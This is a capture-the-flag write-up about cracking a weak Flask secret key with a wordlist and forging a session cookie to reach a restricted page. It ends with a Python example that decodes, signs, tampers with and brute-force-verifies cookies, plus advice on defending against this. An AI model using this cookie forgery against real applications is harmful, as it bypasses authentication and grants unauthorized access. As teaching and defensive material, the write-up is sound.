This is a challenge I found interesting from HackPack CTF (hosted by a student club at NCSU). It’s a web challenge, so we get a link and a hint:
I wonder if they will sell you a Flask of milk to go with your cookies..
Cool, the challenge is called cookie forge, so it probably has to do with web cookies.
If we go to the link we are greeted with a page about cookies. After navigating the website for a bit we can see there are a few pages of interest: a ‘Flagship Loyalty’ page and a login page. If we go to the Flagship Loyalty page it asks us to log in. Interestingly enough, the login page lets you log in with any credentials:
What’s more interesting, though, is what happens after you log in:
Before logging in we had no cookies, but now we have a cookie called ‘session’! A step forward, but unfortunately we still can’t access the Flagship Loyalty page:
Here’s where the hint comes in handy. There’s a Python framework for building web applications called Flask. After doing some research on how Flask handles session cookies, we discover that Flask uses a secret key to sign the session cookie, but the cookie’s contents are only base64 encoded, not encrypted.
The cookie contains the actual session data and parameters, a timestamp, and a signature (an HMAC computed with the secret key) that lets the server check it is a valid cookie it issued itself.
So what do we do in this case? Well, first let’s find the contents of our session cookie. Again, these are just base64 encoded, so you could use a web service or a script, but I’m going to use a tool called ‘flask-unsign’, which was created for dealing with Flask application session cookies.
After inputting the cookie we can see that it contains the parameters ‘flagship’ and ‘username’, and in our case flagship is set to False. This would explain why we can’t access the Flagship Loyalty page even though we are logged in.
In a perfect world we would be able to just change ‘flagship’:False to ‘flagship’:True, base64 encode it again and upload the new cookie. But it’s not that easy: as stated before, Flask session cookies end with a signature computed with the secret key precisely to prevent this.
Lucky for us, there’s another attack vector we can take: we can attempt to brute-force the secret key with a wordlist. So let’s use flask-unsign again:
And bam! We found our secret key: “password1”
In this case I didn’t specify a wordlist, so flask-unsign uses its default wordlist, but you could use something like rockyou or any other wordlist.
Now that we have the secret key we can forge a cookie that will give us access to the Flagship Loyalty page. Again with flask-unsign, we set our parameters and add the secret key to create the cookie:
And now we have the new forged cookie. We replace our existing session cookie with it, and it should now read ‘flagship’:True, giving us access to the page.
Now that we’ve replaced it, save the cookie, and we can access the Flagship Loyalty page, which gives us the flag:
A pretty cool challenge if you ask me. Here are some resources that I found while researching, and the GitHub page for flask-unsign:
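To make the mechanics behind the whole walkthrough concrete (the base64 payload we decoded, the signature that stops us from simply editing it, the wordlist guess of the key, and the forged cookie that results), here is an added example that is not code from the original write-up or from flask-unsign. It reimplements, with only the Python standard library, the `payload.timestamp.signature` layout of the itsdangerous URLSafeTimedSerializer that Flask’s default session interface uses (salt `cookie-session`, HMAC key derivation, SHA-1); that layout is my reading of those libraries, so check it against a real app before relying on it. The sample session, the key `password1` and the tiny wordlist are constructed for the demonstration.

```python
"""Flask-style session cookies: decode, verify, and see why the secret key matters."""
import base64
import hashlib
import hmac
import json
import secrets
import time
import zlib
from typing import Optional

SALT = b"cookie-session"  # Flask's default salt for session cookies


def _b64e(data: bytes) -> str:
    # URL-safe base64 without padding, as itsdangerous emits it
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def _b64d(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def _derived_key(secret_key: str) -> bytes:
    # itsdangerous "hmac" key derivation: HMAC-SHA1(secret_key, salt)
    return hmac.new(secret_key.encode(), SALT, hashlib.sha1).digest()


def decode_payload(cookie: str) -> dict:
    """Read the session data with no key at all: it is encoded, not encrypted."""
    payload = cookie.rsplit(".", 2)[0]
    if payload.startswith("."):  # a leading dot marks a zlib-compressed payload
        return json.loads(zlib.decompress(_b64d(payload[1:])))
    return json.loads(_b64d(payload))


def sign_session(data: dict, secret_key: str, timestamp: Optional[int] = None) -> str:
    """Build payload.timestamp.signature the way Flask's session interface does."""
    raw = json.dumps(data, separators=(",", ":")).encode()
    compressed = zlib.compress(raw)
    if len(compressed) < len(raw) - 1:  # itsdangerous compresses only when it pays off
        payload = "." + _b64e(compressed)
    else:
        payload = _b64e(raw)
    ts = int(time.time()) if timestamp is None else timestamp
    ts_b64 = _b64e(ts.to_bytes((ts.bit_length() + 7) // 8 or 1, "big"))
    signed = f"{payload}.{ts_b64}"
    sig = hmac.new(_derived_key(secret_key), signed.encode(), hashlib.sha1).digest()
    return f"{signed}.{_b64e(sig)}"


def verify_session(cookie: str, secret_key: str, max_age: Optional[int] = None) -> Optional[dict]:
    """Return the session dict only if the signature (and optionally the age) checks out."""
    try:
        payload, ts_b64, sig_b64 = cookie.rsplit(".", 2)
        given = _b64d(sig_b64)
        issued = int.from_bytes(_b64d(ts_b64), "big")
    except ValueError:  # wrong number of parts or malformed base64
        return None
    expected = hmac.new(_derived_key(secret_key), f"{payload}.{ts_b64}".encode(), hashlib.sha1).digest()
    if not hmac.compare_digest(expected, given):
        return None
    if max_age is not None and time.time() - issued > max_age:
        return None
    return decode_payload(cookie)


def tamper_demo(secret_key: str) -> dict:
    """Show which edits are rejected without the key, and why a guessed key is fatal."""
    session = {"flagship": False, "username": "guest"}  # constructed sample session
    cookie = sign_session(session, secret_key)
    # Flip flagship in the payload but keep the original timestamp and signature.
    _, ts_b64, sig_b64 = cookie.rsplit(".", 2)
    edited = _b64e(json.dumps({**session, "flagship": True}, separators=(",", ":")).encode())
    tampered = f"{edited}.{ts_b64}.{sig_b64}"
    # Anyone holding the key does not need to tamper: they mint a fresh valid cookie.
    reissued = sign_session({**session, "flagship": True}, secret_key)
    return {
        "original_ok": verify_session(cookie, secret_key) is not None,
        "tampered_ok": verify_session(tampered, secret_key) is not None,
        "reissued_ok": verify_session(reissued, secret_key) is not None,
    }


def key_in_wordlist(cookie: str, candidates: list) -> Optional[str]:
    """Self-check for a deployment: does any common key verify one of its own cookies?"""
    for candidate in candidates:
        if verify_session(cookie, candidate) is not None:
            return candidate
    return None


def new_secret_key() -> str:
    """What the key should look like instead: 32 random bytes from the OS CSPRNG."""
    return secrets.token_hex(32)


if __name__ == "__main__":
    weak = sign_session({"flagship": False, "username": "guest"}, "password1")
    print("payload:", decode_payload(weak))
    print("checks:", tamper_demo("password1"))
    print("weak key found:", key_in_wordlist(weak, ["admin", "secret", "password1"]))
    print("use instead:", new_secret_key())
```

The `tamper_demo` result is the whole story of the challenge in three booleans: the issued cookie verifies, the payload-only edit does not, and a cookie re-signed with the recovered key does. The defensive takeaway is in the last two functions: a secret key that appears in any public wordlist offers no integrity at all, so the key must come from a CSPRNG, and a `max_age` on verification limits how long a stolen or replayed cookie stays useful.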
Defeating Flask’s Session Management